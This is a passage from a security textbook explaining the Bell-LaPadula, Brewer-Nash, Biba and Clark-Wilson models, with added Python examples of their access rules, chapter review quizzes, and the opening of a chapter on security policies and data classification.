An important issue when designing the software that will operate and control secure computer systems and networks is the security model that the system or network will be based upon. The security model will implement the security policy that has been chosen and enforce those characteristics deemed most important by the system designers. For example, if confidentiality is considered paramount, the model should make certain no data is disclosed to unauthorized individuals. A model enforcing confidentiality may allow unauthorized individuals to modify or delete data, as this would not violate the tenets of the model because the true values for the data would still remain confidential. Of course, this model may not be appropriate for all environments. In some instances, the unauthorized modification of data may be considered a more serious issue than its unauthorized disclosure. In such cases, the model would be responsible for enforcing the integrity of the data instead of its confidentiality. Choosing the model to base the design on is critical if you want to ensure that the resulting system accurately enforces the security policy desired. This, however, is only the starting point, and it does not imply that you have to make a choice between confidentiality and data integrity, as both are important.
Confidentiality Models
Data confidentiality has generally been the chief concern of the military. For instance, the U.S. military encouraged the development of the Bell-LaPadula security model to address data confidentiality in computer operating systems. This model is especially useful in designing multilevel security systems that implement the military’s hierarchical security scheme, which includes levels of classification such as Unclassified, Confidential, Secret, and Top Secret. Similar classification schemes can be used in industry, where classifications might include Publicly Releasable, Proprietary, and Company Confidential. A second confidentiality model, the Brewer-Nash security model, is one defined by controlling read and write access based on conflict of interest rules. This model is also known as the Chinese Wall model, after the concept of separating groups through the use of an impenetrable wall.
Bell-LaPadula Model
The Bell-LaPadula security model employs both mandatory and discretionary access control mechanisms when implementing its two basic security principles. The first of these principles is called the Simple Security Rule, which states that no subject (such as a user or a program) can read information from an object (such as a file) with a security classification higher than that possessed by the subject itself. This means that the system must prevent a user with only a Secret clearance, for example, from reading a document labeled Top Secret. This rule is often referred to as the “no-read-up” rule.
The Simple Security Rule is just that: the most basic of security rules. It essentially states that in order for you to see something, you have to be authorized to see it.
The second security principle enforced by the Bell-LaPadula security model is known as the *-property (pronounced “star property”). This principle states that a subject can write to an object only if the object’s security classification is greater than or equal to the subject’s security classification. This means that a user with a Secret clearance can write to a file with a Secret or Top Secret classification but cannot write to a file with only an Unclassified classification. This at first may appear to be a bit confusing, since this principle allows users to write to files that they are not allowed to view, thus enabling them to actually destroy files that they don’t have the classification to see. This is true, but keep in mind that the Bell-LaPadula model is designed to enforce confidentiality, not integrity. Writing to a file that you don’t have the clearance to view is not considered a confidentiality issue; it is an integrity issue. Whereas the *-property allows a user to write to a file of equal or greater security classification, it doesn’t allow a user to write to a file with a lower security classification. This, too, may be confusing at first—after all, shouldn’t a user with a Secret clearance, who can view a file marked Unclassified, be allowed to write to that file? The answer to this, from a security perspective, is “no.” The reason again relates to wanting to avoid either accidental or deliberate security disclosures. The system is designed to make it impossible (hopefully) for data to be disclosed to those without the appropriate level to view it. As shown in Figure 2.5, if it were possible for a user with a Top Secret clearance to either deliberately or accidentally write Top Secret information and place it in a file marked Confidential, a user with only a Confidential security clearance could then access this file and view the Top Secret information. Thus, data would have been disclosed to an individual not authorized to view it. This is what the system should protect against and is the reason for what is known as the “no-write-down” rule.
• Figure 2.5 Bell-LaPadula security model
Not all environments are more concerned with confidentiality than integrity. In a financial institution, for example, viewing somebody’s bank balance is an issue, but a greater issue would be the ability to actually modify that balance. In environments where integrity is more important, a different model than the Bell-LaPadula security model is needed.
Brewer-Nash Security Model
One of the tenets associated with access is need to know. Separate groups within an organization may have differing needs with respect to access to information. A security model that takes into account user conflict-of-interest aspects is the Brewer-Nash security model. In this model, information flows are modeled to prevent information from flowing between subjects and objects when a conflict of interest would occur. As previously noted, this model is also known as a Chinese Wall model, after the Great Wall of China, a structure designed to separate groups of people. As shown in Figure 2.6, separate groups are defined and access controls are designed to enforce the separation of the groups.
• Figure 2.6 Brewer-Nash security model
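The Brewer-Nash rules can be made concrete: the wall is not fixed in advance but is built from what each subject has already read, and the write rule exists to stop information read behind one wall from being carried to the other side. The following Python is an added example, not from the book; the conflict-of-interest classes and company names are constructed.

```python
# Constructed conflict-of-interest classes: each class lists company datasets that
# compete with one another. Real deployments derive these from business rules.
CONFLICT_CLASSES = {
    "banking": {"Bank A", "Bank B"},
    "energy": {"Oil X", "Oil Y"},
}


def conflict_class_of(company: str) -> str:
    for name, members in CONFLICT_CLASSES.items():
        if company in members:
            return name
    raise KeyError(f"unknown company dataset {company!r}")


class ChineseWall:
    """Brewer-Nash access decisions; the wall is raised by each subject's access history."""

    def __init__(self):
        self.history = {}  # subject -> set of company datasets it has read

    def may_read(self, subject: str, company: str) -> bool:
        """Read rule: allowed unless the subject has already read a competitor's data."""
        target_class = conflict_class_of(company)
        for prior in self.history.get(subject, set()):
            if prior != company and conflict_class_of(prior) == target_class:
                return False
        return True

    def read(self, subject: str, company: str) -> bool:
        """Perform a read if permitted and record it; the record is what builds the wall."""
        if not self.may_read(subject, company):
            return False
        self.history.setdefault(subject, set()).add(company)
        return True

    def may_write(self, subject: str, company: str) -> bool:
        """Write rule: the subject must be able to read the target and must have read
        no other company's data at all; otherwise data read from one company could be
        copied into an object that a competitor's analyst is allowed to read."""
        if not self.may_read(subject, company):
            return False
        return all(prior == company for prior in self.history.get(subject, set()))
```

Note that an analyst who has read Bank A can still read Oil X (a different conflict class) but can no longer write to either: Oil X's file might later be read by someone who also works on Bank B, and the model closes that channel rather than trying to inspect what was written.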
Integrity Models
The Bell-LaPadula model was developed in the early 1970s but was found to be insufficient for all environments. As an alternative, Kenneth Biba studied the integrity issue and developed what is called the Biba security model in the late 1970s. Additional work was performed in the 1980s that led to the Clark-Wilson security model, which also places its emphasis on integrity rather than confidentiality.
The Biba Security Model
In the Biba model (see Figure 2.7), instead of security classifications, integrity levels are used. A principle of integrity levels is that data with a higher integrity level is believed to be more accurate or reliable than data with a lower integrity level. Integrity levels indicate the level of “trust” that can be placed in information at the different levels. Integrity levels differ from security levels in another way—they limit the modification of information as opposed to the flow of information.
• Figure 2.7 Biba security model
An initial attempt at implementing an integrity-based model was captured in what is referred to as the Low-Water-Mark policy. This policy in many ways is the opposite of the *-property in that it prevents subjects from writing to objects of a higher integrity level. The policy also contains a second rule that states the integrity level of a subject will be lowered if it reads an object of a lower integrity level. The reason for this is that if the subject then uses data from that object, the highest the integrity level can be for a new object created from it is the same level of integrity of the original object. In other words, the level of trust you can place in data formed from data at a specific integrity level cannot be higher than the level of trust you have in the subject creating the new data object, and the level of trust you have in the subject can only be as high as the level of trust you had in the original data. The final rule contained in the Low-Water-Mark policy states that a subject can execute a program only if the program’s integrity level is equal to or less than the integrity level of the subject. This ensures that data modified by a program only has the level of trust (integrity level) that can be placed in the individual who executed the program.
While the Low-Water-Mark policy certainly prevents unauthorized modification of data, it has the unfortunate side effect of eventually lowering the integrity levels of all subjects to the lowest level on the system (unless the subject always views files with the same level of integrity). This is because of the second rule, which lowers the integrity level of the subject after accessing an object of a lower integrity level. There is no way specified in the policy to ever raise the subject’s integrity level back to its original value. A second policy, known as the Ring policy, addresses this issue by allowing any subject to read any object without regard to the object’s level of integrity and without lowering the subject’s integrity level. This, unfortunately, can lead to a situation where data created by a subject after reading data of a lower integrity level could end up having a higher level of trust placed upon it than it should. The Biba security model implements a hybrid of the Ring and Low-Water-Mark policies. Biba’s model in many respects is the opposite of the Bell-LaPadula model in that what it enforces are “no-read-down” and “no-write-up” policies. It also implements a third rule that prevents subjects from executing programs of a higher level. The Biba security model thus addresses the problems mentioned with both the Ring and Low-Water-Mark policies.
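The Bell-LaPadula rules from the previous section and the Biba and Low-Water-Mark rules from this one are all comparisons on an ordered set of levels, and putting them side by side shows how the integrity rules invert the confidentiality ones. The following Python is an added example, not from the book; the two lattices are constructed (the classification lattice uses the levels named in the text), and the LowWaterMarkSubject class illustrates the policy's second rule, including the ratchet that never lets a subject's level rise again.

```python
# Constructed lattices, ordered from lowest to highest.
CLASSIFICATIONS = ["Unclassified", "Confidential", "Secret", "Top Secret"]
INTEGRITY_LEVELS = ["Low", "Medium", "High"]


def _rank(level: str, lattice: list) -> int:
    if level not in lattice:
        raise ValueError(f"unknown level {level!r}")
    return lattice.index(level)


# Bell-LaPadula (confidentiality): `subject` is a clearance, `obj` a classification.
def blp_can_read(subject: str, obj: str) -> bool:
    """Simple Security Rule: no read up."""
    return _rank(subject, CLASSIFICATIONS) >= _rank(obj, CLASSIFICATIONS)


def blp_can_write(subject: str, obj: str) -> bool:
    """*-property: no write down."""
    return _rank(obj, CLASSIFICATIONS) >= _rank(subject, CLASSIFICATIONS)


# Biba (integrity): the levels are integrity levels and each rule is BLP's mirror image.
def biba_can_read(subject: str, obj: str) -> bool:
    """No read down: only read objects at least as trustworthy as the subject."""
    return _rank(obj, INTEGRITY_LEVELS) >= _rank(subject, INTEGRITY_LEVELS)


def biba_can_write(subject: str, obj: str) -> bool:
    """No write up: never write to objects more trustworthy than the subject."""
    return _rank(subject, INTEGRITY_LEVELS) >= _rank(obj, INTEGRITY_LEVELS)


def biba_can_execute(subject: str, program: str) -> bool:
    """Third rule: no executing programs of a higher integrity level."""
    return _rank(program, INTEGRITY_LEVELS) <= _rank(subject, INTEGRITY_LEVELS)


class LowWaterMarkSubject:
    """Low-Water-Mark policy: reads are always allowed, but reading a less trustworthy
    object lowers the subject's integrity level, and nothing in the policy raises it."""

    def __init__(self, level: str):
        _rank(level, INTEGRITY_LEVELS)   # validate
        self.level = level

    def read(self, obj: str) -> str:
        """Read `obj`; return the subject's (possibly lowered) level afterwards."""
        if _rank(obj, INTEGRITY_LEVELS) < _rank(self.level, INTEGRITY_LEVELS):
            self.level = obj
        return self.level

    def can_write(self, obj: str) -> bool:
        return biba_can_write(self.level, obj)

    def can_execute(self, program: str) -> bool:
        return biba_can_execute(self.level, program)
```

Running the same pair of levels through both models makes the text's point visible: a Secret subject may write Top Secret data under Bell-LaPadula but a Medium subject may not write High data under Biba, and a Low-Water-Mark subject that once reads Low data can never again write High data, which is the drift down to the lowest level the text describes.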
The Clark-Wilson Security Model
The Clark-Wilson security model takes an entirely different approach than the Biba and Bell-LaPadula models, using transactions as the basis for its rules. It defines two levels of integrity only: constrained data items (CDIs) and unconstrained data items (UDIs). CDI data is subject to integrity controls while UDI data is not. The model then defines two types of processes: integrity verification processes (IVPs), which ensure that CDI data meets integrity constraints (to ensure the system is in a valid state), and transformation processes (TPs), which change the state of data from one valid state to another. Data in this model cannot be modified directly by a user; it must be changed by trusted TPs, access to which can be restricted (thus restricting the ability of a user to perform certain activities). It is useful to return to the prior example of the banking account balance to describe the need for integrity-based models. In the Clark-Wilson model, the account balance would be a CDI because its integrity is a critical function for the bank. A client’s color preference for their checkbook is not a critical function and would be considered a UDI. Since the integrity of account balances is of extreme importance, changes to a person’s balance must be accomplished through the use of a TP. Ensuring that the balance is correct would be the duty of an IVP. Only certain employees of the bank should have the ability to modify an individual’s account, which can be controlled by limiting the number of individuals who have the authority to execute TPs that result in account modification. Certain very critical functions may actually be split into multiple TPs to enforce another important principle, separation of duties (introduced earlier in the chapter). This limits the authority any one individual has so that multiple individuals will be required to execute certain critical functions.
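The banking example can be carried through as code: balances are CDIs reachable only through certified TPs, the checkbook color is a UDI set directly, an IVP states the invariants, and a transfer is split into two TPs that must be run by different people to enforce separation of duties. The following Python is an added example, not the book's code; the account names, roles, and certification table are constructed.

```python
import itertools


class ClarkWilsonBank:
    """Constructed Clark-Wilson style ledger (an illustration, not a real banking system).

    Account balances are constrained data items (CDIs): they change only through the
    transformation processes (TPs) below, each certified for particular roles.
    A checkbook color preference is an unconstrained data item (UDI) set directly.
    """

    def __init__(self, balances: dict, roles: dict):
        self._balances = dict(balances)      # CDIs
        self.preferences = {}                # UDIs
        self._pending = {}                   # requested transfers awaiting approval
        self._ids = itertools.count(1)
        self.roles = roles                   # user -> set of roles (constructed)
        self.certified = {                   # which roles may run which TP
            "request_transfer": {"teller"},
            "approve_transfer": {"supervisor"},
        }
        self._expected_total = sum(self._balances.values())

    def _authorize(self, user: str, tp: str) -> None:
        if not self.roles.get(user, set()) & self.certified[tp]:
            raise PermissionError(f"{user} is not certified to run {tp}")

    def balance(self, account: str) -> int:
        return self._balances[account]

    def set_checkbook_color(self, account: str, color: str) -> None:
        """UDI: no TP and no integrity constraint apply."""
        self.preferences[account] = color

    def request_transfer(self, user: str, src: str, dst: str, amount: int) -> int:
        """TP 1 of 2: a teller records the intent; balances are untouched."""
        self._authorize(user, "request_transfer")
        if amount <= 0 or src not in self._balances or dst not in self._balances:
            raise ValueError("malformed transfer request")
        tid = next(self._ids)
        self._pending[tid] = (user, src, dst, amount)
        return tid

    def approve_transfer(self, user: str, tid: int) -> None:
        """TP 2 of 2: a different, certified person applies the change (separation of duties)."""
        self._authorize(user, "approve_transfer")
        requester, src, dst, amount = self._pending[tid]
        if requester == user:
            raise PermissionError("the requester may not approve their own transfer")
        if self._balances[src] < amount:
            raise ValueError("insufficient funds: the transfer would leave an invalid state")
        self._balances[src] -= amount
        self._balances[dst] += amount
        del self._pending[tid]
        if not self.ivp():
            raise RuntimeError("TP left the CDIs in an invalid state")

    def ivp(self) -> bool:
        """Integrity verification: no negative balance, and money is conserved."""
        non_negative = all(b >= 0 for b in self._balances.values())
        conserved = sum(self._balances.values()) == self._expected_total
        return non_negative and conserved
```

Even a user certified for both TPs cannot move money alone, because the second TP checks who ran the first; limiting who is certified for either TP is the "only certain employees" control the text describes, and the IVP is run after every TP so an invalid state is detected at the transaction that produced it.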
Chapter 2 Review
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following regarding the basics of security, security terminology, and security models.
Define basic terms associated with computer and information security
Information assurance and information security place the security focus on the information and not on the hardware or software used to process it.
The original goal of computer and network security was to provide confidentiality, integrity, and availability—the “CIA” of security.
Additional elements of security can include authentication, authorization, auditability, and nonrepudiation.
The operational model of computer security tells us that protection is provided by prevention, detection, and response.
Identify the basic approaches to computer and information security
Host security focuses on protecting each computer and device individually, whereas network security focuses on addressing protection of the network as a whole.
For many organizations, a combination of host security and network security is needed to adequately address the wide range of possible security threats.
Identify the basic principles of computer and information security
Principle of least privilege is to use the minimum privileges necessary to perform a task.
Principle of separation of privilege states that critical items should require multiple parties.
Principle of fail-safe defaults states that deny by default (implicit deny) and only grant access with explicit permission should be employed in access decisions.
Principle of economy of mechanism states that protection mechanisms should be small and simple.
Principle of complete mediation states that protection mechanisms should cover every access to every object and should never be bypassed.
Principle of open design states that protection mechanisms should not depend upon secrecy of the mechanism itself.
Principle of least common mechanism states that the protection mechanisms should be shared to the least degree possible among users.
Principle of psychological acceptability states that protection mechanisms should not impact users, or if they do, the impact should be minimal.
Principle of defense in depth, or layered security, is that multiple layers of differing, overlapping controls should be employed.
Diversity of defense is a concept that complements the idea of various layers of security. It means to make the layers dissimilar so that if one layer is penetrated, the next layer can’t also be penetrated using the same method.
Distinguish among various methods to implement access controls
Access is the ability of a subject to interact with an object. Access controls are those devices and methods used to limit which subjects may interact with specific objects.
An access control list (ACL) is a mechanism that is used to define whether a user has certain access privileges for a system. Other methods include discretionary access control (DAC), mandatory access control (MAC), role-based access control (RBAC), and rule-based access control.
Describe methods used to verify the identity and authenticity of an individual
Authentication mechanisms ensure that only valid users are provided access to the computer system or network.
The three general methods commonly used in authentication involve users providing either something they know, something they have, or something unique about them (something they are).
Recognize some of the basic models used to implement security in operating systems
Security models enforce the chosen security policy.
There are two basic categories of models: those that ensure confidentiality and those that ensure integrity.
Bell-LaPadula is a confidentiality security model whose development was prompted by the demands of the U.S. military and its security clearance scheme.
The Bell-LaPadula security model enforces “no-read-up” and “no-write-down” rules to avoid the deliberate or accidental disclosure of information to individuals not authorized to receive it.
The Brewer-Nash security model (Chinese Wall model) is a confidentiality model that separates users based on conflicts of interest.
The Biba security model is an integrity-based model that, in many respects, implements the opposite of what the Bell-LaPadula model does—that is, “no-read-down” and “no-write-up” rules.
The Clark-Wilson security model is an integrity-based model designed to limit the processes an individual may perform as well as require that critical data be modified only through specific transformation processes.
Key Terms
*-property, access control, auditability, authentication, availability, Bell-LaPadula security model, Biba security model, Brewer-Nash security model, Clark-Wilson security model, complete mediation, confidentiality, default deny, defense in depth, diversity of defense, economy of mechanism, fail-safe defaults, hacking, host security, implicit deny, integrity, layered security, least common mechanism, least privilege, Low-Water-Mark policy, network security, nonrepudiation, open design, operational model of computer security, phreaking, psychological acceptability, Ring policy, security through obscurity, separation of duties, separation of privilege, Simple Security Rule
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. _______________ is a term used to describe the condition where a user cannot deny that an event has occurred.
2. The _______________ is an integrity-based security model that bases its security on control of the processes that are allowed to modify critical data, referred to as constrained data items.
3. The security principle used in the Bell-LaPadula security model that states that no subject can read from an object with a higher security classification is called the _______________.
4. The principle that states a subject has only the necessary rights and privileges to perform its task, with no additional permissions, is called _______________.
5. _______________ is the principle in security where protection mechanisms should be kept as simple and as small as possible.
6. _______________ is the principle that protection mechanisms should minimize user-level impact.
7. _______________ is the process used to ensure that an individual is who they claim to be.
8. The architecture in which multiple methods of security defense are applied to prevent realization of threat-based risks is called _______________.
9. _______________ is the process of combining seemingly unimportant information with other pieces of information to divulge potentially sensitive information.
10. Implicit deny is an operationalization of the principle of _______________.
Multiple-Choice Quiz
1. Which of the following is not a principle of security?
A. Principle of least privilege
B. Principle of economy of mechanism
C. Principle of efficient access
D. Principle of open access
2. The CIA of security includes:
A. Confidentiality, integrity, authentication
B. Confidentiality, integrity, availability
C. Certificates, integrity, availability
D. Confidentiality, inspection, authentication
3. The security principle used in the Bell-LaPadula security model that states that no subject can read from an object with a higher security classification is the:
A. Simple Security Rule
B. Ring policy
C. Mandatory access control
D. *-property
4. Which of the following concepts requires users and system processes to use the minimal amount of permission necessary to function?
A. Layer defense
B. Diversified defense
C. Simple Security Rule
D. Least privilege
5. Which security model separates users based on conflict-of-interest issues?
A. Bell-LaPadula
B. Brewer-Nash
C. Biba
D. Clark-Wilson
6. The Bell-LaPadula security model is an example of a security model that is based on:
A. The integrity of the data
B. The availability of the data
C. The confidentiality of the data
D. The authenticity of the data
7. The term used to describe the requirement that different portions of a critical process must be performed by different people is:
A. Least privilege
B. Defense in depth
C. Separation of duties
D. Job rotation
8. Hiding information to prevent disclosure is an example of:
A. Security through obscurity
B. Certificate-based security
C. Discretionary data security
D. Defense in depth
9. The problem with the Low-Water-Mark policy is that it:
A. Is aimed at ensuring confidentiality and not integrity
B. Could ultimately result in all subjects having the integrity level of the least-trusted object on the system
C. Could result in the unauthorized modification of data
D. Does not adequately prevent users from viewing files they are not entitled to view
10. The concept of blocking an action unless it is specifically authorized is:
A. Implicit deny
B. Least privilege
C. Simple Security Rule
D. Hierarchical defense model
Essay Quiz
1. Your company has decided to increase the authentication security by requiring remote employees to use a security token as well as a password to log on to the network. The employees are grumbling about the new requirements because they don’t want to have to carry around the token with them and don’t understand why it’s necessary. Write a brief memo to the staff to educate them on the general ways that authentication can be performed. Then explain why your company has decided to use security tokens in addition to passwords.
2. The new CEO for your company just retired from the military and wants to use some of the same computer systems and security software she used while with the military. Explain to her the reasons that confidentiality-based security models are not adequate for all environments. Provide at least two examples of environments where a confidentiality-based security model is not sufficient.
3. Describe why the concept of “security through obscurity” is generally considered a bad principle to rely on. Provide some real-world examples of where you have seen this principle used.
4. Write a brief essay describing the principle of least privilege and how it can be employed to enhance security. Provide at least two examples of environments in which it can be used for security purposes.
Lab Projects
• Lab Project 2.1
In an environment familiar to you (your school or where you work, for example), determine whether the principle of diversity of defense has been employed and list the different layers of security that are employed. Discuss whether you think they are sufficient and whether the principle of diversity of defense has also been used.
• Lab Project 2.2
Pick an operating system that enforces some form of access control and determine how it is implemented in that system.
Chapter 3 Operational and Organizational Security
We will bankrupt ourselves in the vain search for absolute security.
—DWIGHT DAVID EISENHOWER
In this chapter, you will learn how to
Identify various operational aspects to security in your organization
Identify various policies and procedures in your organization
Identify the security awareness and training needs of an organization
Understand the different types of agreements employed in negotiating security requirements
Describe the physical security components that can protect your computers and network
Identify environmental factors that can affect security
Identify factors that affect the security of the growing number of wireless technologies used for data transmission
Prevent disclosure through electronic emanations
Organizations achieve operational security through policies and procedures that guide users’ interactions with data and data processing systems. Developing and aligning these efforts with the goals of the business is a crucial part of developing a successful security program. One method of ensuring coverage is to align efforts with the operational security model described in the last chapter. This breaks efforts into groups: prevention, detection, and response elements. Prevention technologies are designed to keep individuals from being able to gain access to systems or data they are not authorized to use. Originally, this was the sole approach to security. Eventually we learned that in an operational environment, prevention is extremely difficult and relying on prevention technologies alone is not sufficient. This led to the rise of technologies to detect and respond to events that occur when prevention fails. Together, the prevention technologies and the detection and response technologies form the operational model for computer security.
Policies, Procedures, Standards, and Guidelines
An important part of any organization’s approach to implementing security is the policies, procedures, standards, and guidelines that are established to detail what users and administrators should be doing to maintain the security of the systems and network. Collectively, these documents provide the guidance needed to determine how security will be implemented in the organization. Given this guidance, the specific technology and security mechanisms required can be planned for. Policies are high-level, broad statements of what the organization wants to accomplish. They are made by management when laying out the organization’s position on some issue. Procedures are the step-by-step instructions on how to implement policies in the organization. They describe exactly how employees are expected to act in a given situation or to accomplish a specific task. Standards are mandatory elements regarding the implementation of a policy. They are accepted specifications that provide specific details on how a policy is to be enforced. Some standards are externally driven. Regulations for banking and financial institutions, for example, require certain security measures be taken by law. Other standards may be set by the organization to meet its own security goals. Guidelines are recommendations relating to a policy. The key term in this case is recommendations—guidelines are not mandatory steps.
These documents guide how security will be implemented in the organization:
Policies: High-level, broad statements of what the organization wants to accomplish
Procedures: Step-by-step instructions on how to implement the policies
Standards: Mandatory elements regarding the implementation of a policy
Guidelines: Recommendations relating to a policy
Just as the network itself constantly changes, the policies, procedures, standards, and guidelines should be included in living documents that are periodically evaluated and changed as necessary. The constant monitoring of the network and the periodic review of the relevant documents are part of the process that is the operational model. When applied to policies, this process results in what is known as the policy lifecycle. This operational process and policy lifecycle roughly consist of four steps in relation to your security policies and solutions:
1. Plan (adjust) for security in your organization.
2. Implement the plans.
3. Monitor the implementation.
4. Evaluate the effectiveness.
In the first step, you develop the policies, procedures, and guidelines that will be implemented and design the security components that will protect your network. There are a variety of governing instruments, from standards to compliance rules, that will provide boundaries for these documents. Once these documents are designed and developed, you can implement the plans. Part of the implementation of any policy, procedure, or guideline is an instruction period during which those who will be affected by the change or introduction of this new document learn about its contents. Next, you monitor to ensure that both the hardware and the software as well as the policies, procedures, and guidelines are effective in securing your systems. Finally, you evaluate the effectiveness of the security measures you have in place. This step may include a vulnerability assessment (an attempt to identify and prioritize the list of vulnerabilities within a system or network) and a penetration test (a method to check the security of a system by simulating an attack by a malicious individual) of your system to ensure the security is adequate. After evaluating your security posture, you begin again with step one, this time adjusting the security mechanisms you have in place, and then continue with this cyclical process.
Regarding security, every organization should have several common policies in place (in addition to those already discussed relative to access control methods). These include, but are not limited to, security policies regarding change management, classification of information, acceptable use, due care and due diligence, due process, need to know, disposal and destruction of data, service level agreements, human resources issues, codes of ethics, and policies governing incident response.
Security Policies
In keeping with the high-level nature of policies, the security policy is a high-level statement produced by senior management that outlines both what security means to the organization and the organization’s goals for security. The main security policy can then be broken down into additional policies that cover specific topics. Statements such as “this organization will exercise the principle of least access in its handling of client information” would be an example of a security policy. The security policy can also describe how security is to be handled from an organizational point of view (such as describing which office and corporate officer or manager oversees the organization’s security program). In addition to policies related to access control, the organization’s security policy should include the specific policies described in the next sections. All policies should be reviewed on a regular basis and updated as needed. Generally, policies should be updated less frequently than the procedures that implement them, since the high-level goals will not change as often as the environment in which they must be implemented. All policies should be reviewed by the organization’s legal counsel, and a plan should be outlined that describes how the organization will ensure that employees will be made aware of the policies. Policies can also be made stronger by including references to the authority who made the policy (whether this policy comes from the CEO or is a department-level policy, for example) and references to any laws or regulations that are applicable to the specific policy and environment.
Change Management Policy
The purpose of change management is to ensure proper procedures are followed when modifications to the IT infrastructure are made. These modifications can be prompted by a number of different events, including new legislation, updated versions of software or hardware, implementation of new software or hardware, or improvements to the infrastructure. The term “management” implies that this process should be controlled in some systematic way, and that is indeed the purpose. Changes to the infrastructure might have a detrimental impact on operations. New versions of operating systems or application software might be incompatible with other software or hardware the organization is using. Without a process to manage the change, an organization might suddenly find itself unable to conduct business. A change management process should include various stages, including a method to request a change to the infrastructure, a review and approval process for the request, an examination of the consequences of the change, resolution (or mitigation) of any detrimental effects the change might incur, implementation of the change, and documentation of the process as it related to the change.
Data Policies
System integration with third parties frequently involves the sharing of data. Data can be shared for the purpose of processing or storage. Control over data is a significant issue in third-party relationships. There are numerous questions that need to be addressed. The question of who owns the data, both the data shared with third parties and subsequent data developed as part of the relationship, is an issue that needs to be established.
Data Ownership
Data requires a data owner. Data ownership roles for all data elements need to be defined in the business. Data ownership is a business function, where the requirements for security, privacy, retention, and other business functions must be established. Not all data requires the same handling restrictions, but all data requires these characteristics to be defined. This is the responsibility of the data owner.
Unauthorized Data Sharing
Unauthorized data sharing can be a significant issue, and in today’s world, data has value and is frequently used for secondary purposes. Ensuring that all parties in the relationship understand the data-sharing requirements is an important prerequisite. Equally important is ensuring that all parties understand the security requirements of shared data.
Data Backups
Data ownership requirements include backup responsibilities. Data backup requirements include determining the level of backup, restore objectives, and level of protection requirements. These can be defined by the data owner and then executed by operational IT personnel. Determining the backup responsibilities and developing the necessary operational procedures to ensure that adequate backups occur are important security elements.
Classification of Information
A key component of IT security is the protection of the information processed and stored on the computer systems and network. Organizations deal with many different types of information, and they need to recognize that not all information is of equal importance or sensitivity. This requires classification of information into various categories, each with its own requirements for its handling. Factors that affect the classification of specific information include its value to the organization (what will be the impact to the organization if it loses this information?), its age, and laws or regulations that govern its protection. The most widely known system of classification of information is that implemented by the U.S. government (including the military), which classifies information into categories such as Confidential, Secret, and Top Secret. Businesses have similar desires to protect information and often use categories such as Publicly Releasable, Proprietary, Company Confidential, and For Internal Use Only. Each policy for the classification of information should describe how it should be protected, who may have access to it, who has the authority to release it and how, and how it should be destroyed. All employees of the organization should be trained in the procedures for handling the information that they are authorized to access. Mandatory access control uses these classifications directly: the label on the resource is compared with the clearance of the subject, and the system, not the resource owner, makes the decision. Discretionary access control leaves the decision to the owner, who can still use the classification labels as the basis for deciding who may have access to what resources.
Tech Tip
Data Classification
Information classification categories you should be aware of for the CompTIA Security+ exam include: High, Medium, Low, Confidential, Private, and Public.
Data Labeling, Handling, and Disposal
Effective data classification programs include data labeling, which enables personnel working with the data to know whether it is sensitive and to understand the levels of protection required. When the data is inside an information-processing system, the protections should be designed into the system. But when the data leaves this cocoon of protection, whether by printing, downloading, or copying, it becomes necessary to ensure continued protection by other means. This is where data labeling assists users in fulfilling their responsibilities. Training to ensure that labeling occurs and that it is used and followed is important for users whose roles can be impacted by this material. Training plays an important role in ensuring proper data handling and disposal. Personnel are intimately involved in several specific tasks associated with data handling and data destruction/disposal and, if properly trained, can act as a security control. Untrained or inadequately trained personnel will not be a productive security control and, in fact, can be a source of potential compromise.
Need to Know
Another common security principle is that of need to know, which goes hand-in-hand with least privilege. The guiding factor here is that each individual in the organization is supplied with only the absolute minimum amount of information and privileges he or she needs to perform their work tasks. To obtain access to any piece of information, the individual must have a justified need to know. A policy spelling out these two principles as guiding philosophies for the organization should be created. The policy should also address who in the organization can grant access to information and who can assign privileges to employees.
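The classification, labeling, and need-to-know passages above describe a decision rule without showing it. The following is an added example (not code from the book) of how a mandatory, classification-based check combines with need-to-know compartments: a subject may read a document only if its clearance is at least the document’s level (“no read up”) and it holds every compartment the document is tagged with; a copy that leaves the system is stamped with its label. The business levels are the four named in the text; their ordering, the compartment names, and the subjects and documents are assumptions constructed for illustration. The “no write down” rule is the Bell-LaPadula *-property, which the text does not mention.

```python
"""Classification-based access check with need-to-know compartments.

Added example; the level ordering, compartment names, users and documents
are constructed for illustration, not taken from any real policy.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, Tuple

# Ordered from least to most sensitive (business labels from the text; the
# ordering itself is an assumption).
LEVELS = ("Publicly Releasable", "For Internal Use Only",
          "Company Confidential", "Proprietary")
RANK = {name: i for i, name in enumerate(LEVELS)}


@dataclass(frozen=True)
class Subject:
    name: str
    clearance: str                                # highest level the subject may read
    need_to_know: FrozenSet[str] = frozenset()    # compartments granted to the subject


@dataclass(frozen=True)
class Document:
    title: str
    classification: str
    compartments: FrozenSet[str] = frozenset()    # e.g. {"HR"}; empty = no compartment
    body: str = ""


def rank(level: str) -> int:
    """Position of a label in the lattice; an unknown label is refused, not treated as Public."""
    if level not in RANK:
        raise ValueError(f"unknown classification label: {level!r}")
    return RANK[level]


def can_read(subject: Subject, doc: Document) -> bool:
    """Mandatory check: no read up, and need to know for every compartment on the document."""
    return (rank(subject.clearance) >= rank(doc.classification)
            and doc.compartments <= subject.need_to_know)


def can_write(subject: Subject, doc: Document) -> bool:
    """No write down: a subject may only write into documents labelled at or above its clearance."""
    return rank(subject.clearance) <= rank(doc.classification)


def export(subject: Subject, doc: Document) -> str:
    """Data labeling at the boundary: the copy that leaves the system carries a visible banner."""
    if not can_read(subject, doc):
        raise PermissionError(f"{subject.name} may not read {doc.title!r}")
    banner = f"*** {doc.classification.upper()} ***"
    return f"{banner}\n{doc.body}\n{banner}"


def access_matrix() -> Dict[Tuple[str, str], bool]:
    """Constructed subjects and documents; returns who may read what."""
    hr_doc = Document("Salary bands", "Company Confidential", frozenset({"HR"}), "band A: ...")
    public_doc = Document("Press release", "Publicly Releasable", body="We are pleased ...")
    alice = Subject("alice", "Company Confidential", frozenset({"HR"}))  # cleared and need to know
    bob = Subject("bob", "Proprietary")                                  # cleared higher, no HR need to know
    carol = Subject("carol", "For Internal Use Only", frozenset({"HR"}))  # need to know, not cleared
    return {(s.name, d.title): can_read(s, d)
            for s in (alice, bob, carol)
            for d in (hr_doc, public_doc)}


if __name__ == "__main__":
    for (who, what), allowed in access_matrix().items():
        print(f"{who:6} {what:14} {'READ' if allowed else 'DENY'}")
```

Note that bob is denied the HR document despite holding a higher clearance than it needs: clearance alone never satisfies need to know.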
Disposal and Destruction Policy
